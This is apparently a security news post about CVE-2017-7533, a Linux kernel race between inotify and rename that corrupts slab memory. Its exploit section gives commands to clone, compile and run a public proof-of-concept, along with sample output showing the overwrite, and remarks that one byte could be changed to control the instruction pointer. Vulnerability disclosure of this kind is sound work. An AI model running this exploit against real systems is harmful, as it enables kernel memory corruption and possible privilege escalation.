CVE-2017-7533: privileges escalation/denial of service vulnerability on Linux Kernel 4.12.4

by do son · Published October 17, 2017 · Updated November 4, 2024

CVE-2017-7533

A race condition was found in the Linux kernel, present since v3.14-rc1 through v4.12. The race happens between threads of inotify_handle_event() and vfs_rename() while running the rename operation against the same file. As a result of the race, the next slab data or the slab’s free list pointer can be corrupted with attacker-controlled data, which may lead to the privilege escalation.

Find out more about CVE-2017-7533 from the MITRE CVE dictionary dictionary and NIST NVD.

Exploit

git clone https://github.com/hardenedlinux/offensive_poc.git
cd offensive_poc/CVE-2017-7533
gcc -o exploit exploit.c -lpthread
./exploit

“`
Listening for events.
Listening for events.
alloc_len : 50
longname=”test_dir/bbbb32103210321032100��1��”
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
alloc_len : 50
“`

This is a heap overflow bug, tested on the Debian 8 Linux version 3.16.39(amd64) successfully.

You could modify one byte to manipulate rip register, but I do not try hard to get root.

Thanks to the Vladis Dronov <vdronov () redhat com> and someone from HK University.

Source:

https://access.redhat.com/security/cve/cve-2017-7533
https://github.com/hardenedlinux/offensive_poc/tree/master/CVE-2017-7533

CVE-2017-7533: privileges escalation/denial of service vulnerability on Linux Kernel 4.12.4

Search

Brilliantly

Content & Links